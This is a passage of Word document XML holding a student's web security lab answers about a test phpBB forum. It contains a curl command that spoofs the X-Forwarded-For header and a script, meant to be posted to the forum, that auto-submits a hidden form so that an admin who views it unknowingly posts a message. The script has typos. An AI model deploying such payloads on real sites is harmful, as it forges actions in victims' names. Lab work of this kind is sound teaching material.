    <w:p w14:paraId="0845F72A" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F"/>
    <w:p w14:paraId="3592CF21" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B40C972" wp14:editId="70FECFB5">
            <wp:extent cx="6645910" cy="433324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4333240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E885961" w14:textId="364BDDD9" w:rsidR="00C148EC" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:t xml:space="preserve">Attacker successfully posted for admin. </w:t>
      </w:r>
      <w:r w:rsidR="00C148EC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D54D32" w14:textId="5861397E" w:rsidR="00481CC0" w:rsidRPr="007D1838" w:rsidRDefault="00A70FF5" w:rsidP="00A70FF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 5 (15 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE7D78" w14:textId="361899D8" w:rsidR="00A26896" w:rsidRDefault="00A26896" w:rsidP="00A26896">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="004B5945" w:rsidRPr="004B5945">
        <w:t>Explain a possible workaround that enables an attack on the same-network scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5747DC" w14:textId="000E9444" w:rsidR="004B5945" w:rsidRDefault="004B5945" w:rsidP="00A26896">
      <w:r>
        <w:t xml:space="preserve">Workaround #1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8FF5A" w14:textId="122FBBD6" w:rsidR="00A26896" w:rsidRDefault="00A26896" w:rsidP="00A26896">
      <w:r>
        <w:t xml:space="preserve">Let </w:t>
      </w:r>
      <w:r w:rsidR="005A0295" w:rsidRPr="005A0295">
        <w:t>192.168.0.2</w:t>
      </w:r>
      <w:r w:rsidR="005A0295">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">be the IP address of the victim on the same network. We </w:t>
      </w:r>
      <w:r w:rsidR="005A0295">
        <w:t>can use the -H/--header argument to spoof our IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711C61C4" w14:textId="606FC66B" w:rsidR="00A26896" w:rsidRDefault="00A26896" w:rsidP="00A26896">
      <w:r w:rsidRPr="00A26896">
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="005A0295">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A26896">
        <w:t xml:space="preserve">--header "X-Forwarded-For: </w:t>
      </w:r>
      <w:r w:rsidR="005A0295" w:rsidRPr="005A0295">
        <w:t>192.168.0.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26896">
        <w:t>" "'http://www.xsslabphpbb.com/posting.php' "</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="005A0295">
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582F352" w14:textId="68D2C104" w:rsidR="00A26896" w:rsidRDefault="00A26896" w:rsidP="00A26896"/>
    <w:p w14:paraId="1514E5D1" w14:textId="77777777" w:rsidR="004B5945" w:rsidRDefault="004B5945" w:rsidP="00A26896">
      <w:r>
        <w:t xml:space="preserve">This would only work if the attacker and victim was on the same network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF237C" w14:textId="0C313E77" w:rsidR="004B5945" w:rsidRDefault="004B5945" w:rsidP="00A26896"/>
    <w:p w14:paraId="58361CB7" w14:textId="4A9F7625" w:rsidR="004B5945" w:rsidRDefault="004B5945" w:rsidP="00A26896">
      <w:r>
        <w:t>Workaround #2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7843B694" w14:textId="5DC133DA" w:rsidR="004B5945" w:rsidRDefault="004B5945" w:rsidP="00A26896">
      <w:r>
        <w:t xml:space="preserve">Alternatively, the attacker can have make a script with hidden field inputs that automatically sends a post request when loaded. This type of attack also work on different network scenario. It is explained in Q5.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA94F6" w14:textId="77777777" w:rsidR="004B5945" w:rsidRDefault="004B5945" w:rsidP="00A26896"/>
    <w:p w14:paraId="610CCB44" w14:textId="425DE8DB" w:rsidR="00C148EC" w:rsidRDefault="004B5945" w:rsidP="004B5945">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00A70FF5">
        <w:t xml:space="preserve">Explain a possible workaround that enables an attack on the </w:t>
      </w:r>
      <w:r w:rsidR="00A26896">
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidR="00A70FF5">
        <w:t xml:space="preserve">-network scenario. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA20B8" w14:textId="1A2BC664" w:rsidR="00ED37AC" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00D124A1">
        <w:t xml:space="preserve">the same </w:t>
      </w:r>
      <w:r>
        <w:t>network, the attacker would need to find a way for the victim to unknowingly send a post request</w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:t xml:space="preserve"> from their own machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For this </w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:t xml:space="preserve">the attacker can implement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED37AC">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED37AC">
        <w:t xml:space="preserve"> code that has hidden fields that automatically sends out a post request to </w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC" w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://www.xsslabphpbb.com/posting.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:t xml:space="preserve">whenever it is viewed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EA6A9" w14:textId="77777777" w:rsidR="00ED37AC" w:rsidRDefault="00ED37AC" w:rsidP="005D20AF"/>
    <w:p w14:paraId="53A6DA2E" w14:textId="6F263225" w:rsidR="005D20AF" w:rsidRDefault="00ED37AC" w:rsidP="005D20AF">
      <w:r>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="00B9216D">
        <w:t>can do it in the following way:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FAE83" w14:textId="77777777" w:rsidR="00ED37AC" w:rsidRDefault="00ED37AC" w:rsidP="005D20AF"/>
    <w:p w14:paraId="15936081" w14:textId="280A3FD6" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:r>
        <w:t xml:space="preserve"> Attacker post a message on the forum with the following script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BAB546" w14:textId="77777777" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF"/>
    <w:p w14:paraId="7BC901C2" w14:textId="6BDBA6B0" w:rsidR="00B9216D" w:rsidRPr="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;script type = “text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6496A8D1" w14:textId="352C77EF" w:rsidR="00B9216D" w:rsidRPr="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>forge_post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601E957" w14:textId="3E4BC0AF" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2BD7D5" w14:textId="1038E297" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>var fields;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC97E2" w14:textId="23BB84B5" w:rsidR="00ED37AC" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>fields += “&lt;input type=’hidden’ name=</w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’subject’ value=’hi’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7DEB4" w14:textId="259C11D2" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>fields +=</w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> “&lt;input type=’hidden’ name=’message’ value=’post by admin by attacker’&gt;”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C14AC" w14:textId="6C21D8C8" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698669BD" w14:textId="791ED6B2" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">var p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(“form”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1F6686" w14:textId="323C388B" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://www.xsslabphpbb.com/posting.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF51899" w14:textId="223A9807" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p.innerHTLML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = fields;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE70309" w14:textId="3F2B1BAF" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = “post”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1D29A" w14:textId="5911CB05" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.body.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(p);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA656DC" w14:textId="4E41DE0D" w:rsidR="00B9216D" w:rsidRPr="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545CE1DB" w14:textId="70E539CD" w:rsidR="00B9216D" w:rsidRPr="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E75D6B" w14:textId="0B2320E3" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9216D">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indow.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function() {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>forge_post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC35CC5" w14:textId="55642441" w:rsidR="00B9216D" w:rsidRPr="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B6042" w14:textId="535891AD" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="005D20AF"/>
    <w:p w14:paraId="07D9818D" w14:textId="12D2573D" w:rsidR="00B9216D" w:rsidRDefault="00B9216D" w:rsidP="00ED37AC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This code creates a form with entries specified by the field string, and its type being sent to post. The field required for posting on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fourm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the subject and message body. The important part of the input type is that it is “hidden”, meaning that when the admin looks at the post, even though it is being sent out for admin, admin cannot see the form being sent out. The form is automatically submitted when the program executes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(). This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is automatically executed when the page is loaded, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> when admin looks at the new message posted by attacker because of the code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>window.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00D124A1">
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="00ED37AC">
        <w:t xml:space="preserve"> because, essentially, when the victim clicks on the post by attacker, the victim is posting a message from his/her own computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27959B73" w14:textId="31795542" w:rsidR="00D124A1" w:rsidRDefault="00D124A1" w:rsidP="00ED37AC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C88D96" w14:textId="77777777" w:rsidR="00D124A1" w:rsidRDefault="00D124A1" w:rsidP="00ED37AC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D124A1" w:rsidSect="00A0452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ndale Mono">
    <w:panose1 w:val="020B0509000000000004"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>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13D72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7654D7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E454872"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E8EAA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5A65D4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83EC5B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47E03B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2CEA3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C2B7AC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3572BA6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2AB"/>
    <w:rsid w:val="00151434"/>
    <w:rsid w:val="002D4736"/>
    <w:rsid w:val="003218A4"/>
    <w:rsid w:val="003E37D5"/>
    <w:rsid w:val="004022C6"/>
    <w:rsid w:val="00476620"/>
    <w:rsid w:val="00481CC0"/>
    <w:rsid w:val="004842AB"/>
    <w:rsid w:val="004B5945"/>
    <w:rsid w:val="00506865"/>
    <w:rsid w:val="005A0295"/>
    <w:rsid w:val="005D20AF"/>
    <w:rsid w:val="00730E4C"/>
    <w:rsid w:val="00775B95"/>
    <w:rsid w:val="007D1838"/>
    <w:rsid w:val="008B3740"/>
    <w:rsid w:val="009F445F"/>
    <w:rsid w:val="00A04529"/>
    <w:rsid w:val="00A26896"/>
    <w:rsid w:val="00A70FF5"/>
    <w:rsid w:val="00B052BF"/>
    <w:rsid w:val="00B9216D"/>
    <w:rsid w:val="00C148EC"/>
    <w:rsid w:val="00C87167"/>
    <w:rsid w:val="00CC7638"/>
    <w:rsid w:val="00D124A1"/>
    <w:rsid w:val="00D3764F"/>
    <w:rsid w:val="00ED37A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2CFE58A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{74853CF7-2E44-1C46-8856-8610FD17E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FF5"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
